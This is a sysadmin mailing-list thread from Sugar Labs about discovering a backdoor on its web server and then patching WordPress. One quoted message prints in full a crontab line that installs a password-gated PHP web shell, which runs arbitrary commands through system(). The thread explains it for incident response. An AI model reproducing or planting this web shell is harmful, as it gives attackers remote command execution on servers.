[Systems] Found a backdoor

Walter Bender walter.bender at gmail.com
Sun Mar 6 21:41:18 EST 2016
Previous message: [Systems] Found a backdoor
Next message: [Systems] {wiki, activities}.sugarlabs.org dead, no response to HTTP GET
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Thanks Samuel. I'll try to populate it this week.

-walter

On Sun, Mar 6, 2016 at 8:02 PM, Samuel Cantero <scanterog at gmail.com> wrote:

> Hi Walter,
>
> I have updated the WP version on your site to the last one (4.4.2). I also
> uploaded the last version of the akismet plugin to the wp plugin folder. In
> theory, you should activate it through the wp admin interface in order to
> make it work again. If you find something broken just let me know.
>
> Best regards,
>
> Samuel C.
>
> On Tue, Mar 1, 2016 at 10:55 PM, Samuel Cantero <scanterog at gmail.com>
> wrote:
>
>> If you want to keep it and I can do the job. I will try to do it this
>> weekend.
>>
>> Best regards,
>>
>> Samuel C.
>>
>> On Tue, Mar 1, 2016 at 10:49 PM, Walter Bender <walter.bender at gmail.com>
>> wrote:
>>
>>> Let's shut it down for the time being. I've been updating the wiki but
>>> not my blog since the attack last year anyway.
>>>
>>> -walter
>>>
>>> On Tue, Mar 1, 2016 at 7:57 PM, Bernie Innocenti <bernie at codewiz.org>
>>> wrote:
>>>
>>>> +walter
>>>>
>>>> Can we appoint an official maintainer for walterbender.org? Sorry for
>>>> not stepping up myself, but I'm overwhelmed by work related things and
>>>> trying to reduce my sysadmin load.
>>>>
>>>> On 03/01/2016 02:50 PM, Samuel Cantero wrote:
>>>> > On Tue, Mar 1, 2016 at 3:21 AM, Bernie Innocenti <bernie at codewiz.org
>>>> > <mailto:bernie at codewiz.org>> wrote:
>>>> >
>>>> >     On 02/25/2016 04:09 AM, Sebastian Silva wrote:
>>>> >     > Remember in June we had an incident with a broken Wordpress
>>>> site.
>>>> >     > I switched to static generator since then.
>>>> >     >
>>>> >     > +1 on containers just learning more about them and finding them
>>>> fascinating.
>>>> >     > Count me in on containerizing everything.
>>>> >     >
>>>> >     > I'm not aware of other wordpress sites. Maybe walter's blog?
>>>> >     > Wordpress is a PIA IMHO.
>>>> >
>>>> >     Yes, WP is riddled with security holes. Back in October, Samuel
>>>> helped
>>>> >     Walter upgrade walterbender.org <http://walterbender.org> on
>>>> >     sunjammer. Samuel, can you confirm
>>>> >     that the WP instance now fully patched and locked down?
>>>> >
>>>> >
>>>> > The WP version on walterbender.org <http://walterbender.org> site is
>>>> > 4.3.1. The WP last version is 4.4.2. I have checked the WP change log
>>>> > and we can find this:
>>>> >
>>>> > 4.4.1 => WordPress versions 4.4 and earlier are affected by a
>>>> cross-site
>>>> > scripting vulnerability that could allow a site to be compromised.
>>>> >
>>>> > 4.4.2 => WordPress versions 4.4.1 and earlier are affected by two
>>>> > security issues: a possible SSRF for certain local URIs, and an open
>>>> > redirection attack.
>>>> >
>>>> > This site also uses the 2.5.9 akismet plugin. The last version is
>>>> 3.1.7.
>>>> > Significant information on the release notes:
>>>> >
>>>> >   * Pre-emptive security improvements to ensure that the Akismet
>>>> plugin
>>>> >     can't be used by attackers to compromise a WordPress installation.
>>>> >   * Closes a potential XSS vulnerability.
>>>> >
>>>> > Of course, every version has a lot of bug fixes. We definitely should
>>>> > upgrade it and test nothing breaks walterbender.org
>>>> > <http://walterbender.org> site.
>>>> >
>>>> > Who is in charge of upgrading the others WP sites?
>>>> >
>>>> > Regards,
>>>> >
>>>> > Samuel C.
>>>> >
>>>> >
>>>> >
>>>> >
>>>> >     > Regards,
>>>> >     > Sebastian
>>>> >     >
>>>> >     >
>>>> >     > On 25/02/16 04:47, Bernie Innocenti wrote:
>>>> >     >> While I was looking for cronjobs in /var/spool/cron/crontabs/,
>>>> i
>>>> >     found
>>>> >     >> that www-data was executing commands like these:
>>>> >     >>
>>>> >     >> */27 * * * * echo '<?php if
>>>> (substr(md5($_GET["localdate"]),0,6) ==
>>>> >     >> "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]);
>>>> >     >> @system($time); exit; } ?>' >
>>>> /srv/www-somosazucar/blog/.cache.php
>>>> >     >>
>>>> >     >> Did you spot the system()? This executes arbitrary commands
>>>> specified
>>>> >     >> via the "localtime" url parameter. Uh-oh.
>>>> >     >>
>>>> >     >> There were about a dozen lines like the above, installing
>>>> >     .cache.php in
>>>> >     >> various virtualhosts. I kept a copy of the file in
>>>> >     >> /root/www-data.backdoor. The file was last written on Jun 23
>>>> 2015,
>>>> >     >> which may correlate with the switch to the new website.
>>>> >     >>
>>>> >     >> I cleared the mess and searched the logs for requests
>>>> containing
>>>> >     >> "localtime", but couldn't find any. I wonder if they could
>>>> filter the
>>>> >     >> logs, since they were previously writable by www-data.
>>>> >     >>
>>>> >     >> Please watch out. We should ensure directories accessible over
>>>> >     http are
>>>> >     >> not writable by user www-data, especially those in which PHP
>>>> and CGIs
>>>> >     >> are enabled.
>>>> >     >>
>>>> >     >> Running several large sites under the same uid has always been
>>>> a bad
>>>> >     >> security practice, and looking forward we should keep migrating
>>>> >     them to
>>>> >     >> properly isolated containers.
>>>> >     >>
>>>> >     >> Finally, Wordpress is particularly dangerous and we should
>>>> update and
>>>> >     >> harden all instances. Can someone please take care of this?
>>>> I'll do
>>>> >     >> Mediawiki, which I know pretty well.
>>>> >     >>
>>>> >     >
>>>> >
>>>> >
>>>> >     --
>>>> >      _ // Bernie Innocenti
>>>> >      \X/  http://codewiz.org
>>>> >     _______________________________________________
>>>> >     Systems mailing list
>>>> >     Systems at lists.sugarlabs.org <mailto:Systems at lists.sugarlabs.org>
>>>> >     http://lists.sugarlabs.org/listinfo/systems
>>>> >
>>>> >
>>>> >
>>>> >
>>>> > _______________________________________________
>>>> > Systems mailing list
>>>> > Systems at lists.sugarlabs.org
>>>> > http://lists.sugarlabs.org/listinfo/systems
>>>> >
>>>>
>>>>
>>>> --
>>>>  _ // Bernie Innocenti
>>>>  \X/  http://codewiz.org
>>>>
>>>
>>>
>>>
>>> --
>>> Walter Bender
>>> Sugar Labs
>>> http://www.sugarlabs.org
>>> <http://www.sugarlabs.org>
>>>
>>
>>
>


-- 
Walter Bender
Sugar Labs
http://www.sugarlabs.org
<http://www.sugarlabs.org>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.sugarlabs.org/archive/systems/attachments/20160306/b63d8a06/attachment.html>
Previous message: [Systems] Found a backdoor
Next message: [Systems] {wiki, activities}.sugarlabs.org dead, no response to HTTP GET
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
More information about the Systems mailing list